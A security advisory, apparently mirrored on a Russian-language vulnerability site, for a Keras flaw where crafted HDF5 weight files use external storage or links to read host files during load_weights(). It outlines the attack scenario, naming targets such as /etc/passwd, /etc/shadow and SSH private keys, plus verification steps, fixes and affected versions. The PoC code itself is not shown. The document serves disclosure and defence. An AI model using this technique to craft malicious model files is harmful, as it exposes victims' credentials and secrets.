Описание
Keras has a Local File Disclosure via HDF5 External Storage During Keras Weight Loading
Summary
TensorFlow / Keras continues to honor HDF5 “external storage” and ExternalLink features when loading weights. A malicious .weights.h5 (or a .keras archive embedding such weights) can direct load_weights() to read from an arbitrary readable filesystem path. The bytes pulled from that path populate model tensors and become observable through inference or subsequent re-save operations. Keras “safe mode” only guards object deserialization and does not cover weight I/O, so this behaviour persists even with safe mode enabled. The issue is confirmed on the latest publicly released stack (tensorflow 2.20.0, keras 3.11.3, h5py 3.15.1, numpy 2.3.4).
Impact
- Class: CWE-200 (Exposure of Sensitive Information), CWE-73 (External Control of File Name or Path)
- What leaks: Contents of any readable file on the host (e.g.,
/etc/hosts,/etc/passwd,/etc/hostname). - Visibility: Secrets appear in model outputs (e.g., Dense layer bias) or get embedded into newly saved artifacts.
- Prerequisites: Victim executes
model.load_weights()ortf.keras.models.load_model()on an attacker-supplied HDF5 weights file or.kerasarchive. - Scope: Applies to modern Keras (3.x) and TensorFlow 2.x lines; legacy HDF5 paths remain susceptible.
Attacker Scenario
- Initial foothold: The attacker convinces a user (or CI automation) to consume a weight artifact—perhaps by publishing a pre-trained model, contributing to an open-source repository, or attaching weights to a bug report.
- Crafted payload: The artifact bundles innocuous model metadata but rewrites one or more datasets to use HDF5 external storage or external links pointing at sensitive files on the victim host (e.g.,
/home/<user>/.ssh/id_rsa,/etc/shadowif readable, configuration files containing API keys, etc.). - Execution: The victim calls
model.load_weights()(ortf.keras.models.load_model()for.kerasarchives). HDF5 follows the external references, opens the targeted host file, and streams its bytes into the model tensors. - Exfiltration vectors:
- Running inference on controlled inputs (e.g., zero vectors) yields outputs equal to the injected weights; the attacker or downstream consumer can read the leaked data.
- Re-saving the model (weights or
.kerasarchive) persists the secret into a new artifact, which may later be shared publicly or uploaded to a model registry. - If the victim pushes the re-saved artifact to source control or a package repository, the attacker retrieves the captured data without needing continued access to the victim environment.
Additional Preconditions
- The target file must exist and be readable by the process running TensorFlow/Keras.
- Safe mode (
load_model(..., safe_mode=True)) does not mitigate the issue because the attack path is weight loading rather than object/lambda deserialization. - Environments with strict filesystem permissioning or sandboxing (e.g., container runtime blocking access to
/etc/hostname) can reduce impact, but common defaults expose a broad set of host files.
Environment Used for Verification (2025‑10‑19)
- OS: Debian-based container running Python 3.11.
- Packages (installed via
python -m pip install -U ...):tensorflow==2.20.0keras==3.11.3h5py==3.15.1numpy==2.3.4
- Tooling:
strace(for syscall tracing),pipupgraded to latest before installs. - Debug flags:
PYTHONFAULTHANDLER=1,TF_CPP_MIN_LOG_LEVEL=0during instrumentation to capture verbose logs if needed.
Reproduction Instructions (Weights-Only PoC)
- Ensure the environment above (or equivalent) is prepared.
- Save the following script as
weights_external_demo.py:
- Execute
python weights_external_demo.py. - Observe:
secret_text_sourceprints the chosen host file path.recovered_ascii/recovered_hex64display the file contents recovered via model inference.- A re-saved weights file contains the leaked bytes inside the artifact.
Expanded Validation (Multiple Attack Scenarios)
The following test harness generalises the attack for multiple HDF5 constructs:
- Build a minimal feed-forward model and baseline weights.
- Create three malicious variants:
- External storage dataset: dataset references
/etc/hosts. - External link:
ExternalLinkpointing at/etc/passwd. - Indirect link: external storage referencing a helper HDF5 that, in turn, refers to
/etc/hostname.
- External storage dataset: dataset references
- Run each scenario under
strace -f -e trace=open,openat,readwhile callingmodel.load_weights(...). - Post-process traces and weight tensors to show the exact bytes loaded.
Relevant syscall excerpts captured during the run:
The corresponding model weight bytes (converted to ASCII) mirrored these file contents, confirming successful exfiltration in every case.
Recommended Product Fix
- Default-deny external datasets/links:
- Inspect creation property lists (
get_external_count) before materialising tensors. - Resolve
SoftLink/ExternalLinktargets and block if they leave the HDF5 file.
- Inspect creation property lists (
- Provide an escape hatch:
- Offer an explicit
allow_external_data=Trueflag or environment variable for advanced users who truly rely on HDF5 external storage.
- Offer an explicit
- Documentation:
- Update security guidance and API docs to clarify that weight loading bypasses safe mode and that external HDF5 references are rejected by default.
- Regression coverage:
- Add automated tests mirroring the scenarios above to ensure future refactors do not reintroduce the issue.
Workarounds
- Avoid loading untrusted HDF5 weight files.
- Pre-scan weight files using
h5pyto detect external datasets or links before invoking Keras loaders. - Prefer alternate formats (e.g., NumPy
.npz) that lack external reference capabilities when exchanging weights. - If isolation is unavoidable, run the load inside a sandboxed environment with limited filesystem access.
Timeline (UTC)
- 2025‑10‑18: Initial proof against TensorFlow 2.12.0 confirmed local file disclosure.
- 2025‑10‑19: Re-validated on TensorFlow 2.20.0 / Keras 3.11.3 with syscall tracing; produced weight artifacts and JSON summaries for each malicious scenario; implemented
safe_keras_hdf5.pyprototype guard.
Ссылки
- https://github.com/keras-team/keras/security/advisories/GHSA-3m4q-jmj6-r34q
- https://nvd.nist.gov/vuln/detail/CVE-2026-1669
- https://github.com/keras-team/keras/pull/22057
- https://github.com/keras-team/keras/commit/8a37f9dadd8e23fa4ee3f537eeb6413e75d12553
- https://github.com/keras-team/keras/releases/tag/v3.12.1
- https://github.com/keras-team/keras/releases/tag/v3.13.2
Пакеты
keras
>= 3.13.0, < 3.13.2
3.13.2
keras
>= 3.0.0, < 3.12.1
3.12.1
Связанные уязвимости
Arbitrary file read in the model loading mechanism (HDF5 integration) in Keras versions 3.0.0 through 3.13.1 on all supported platforms allows a remote attacker to read local files and disclose sensitive information via a crafted .keras model file utilizing HDF5 external dataset references.
Arbitrary file read in the model loading mechanism (HDF5 integration) in Keras versions 3.0.0 through 3.13.1 on all supported platforms allows a remote attacker to read local files and disclose sensitive information via a crafted .keras model file utilizing HDF5 external dataset references.
Arbitrary file read in the model loading mechanism (HDF5 integration) in Keras versions 3.0.0 through 3.13.1 on all supported platforms allows a remote attacker to read local files and disclose sensitive information via a crafted .keras model file utilizing HDF5 external dataset references.
Arbitrary file read in the model loading mechanism (HDF5 integration) ...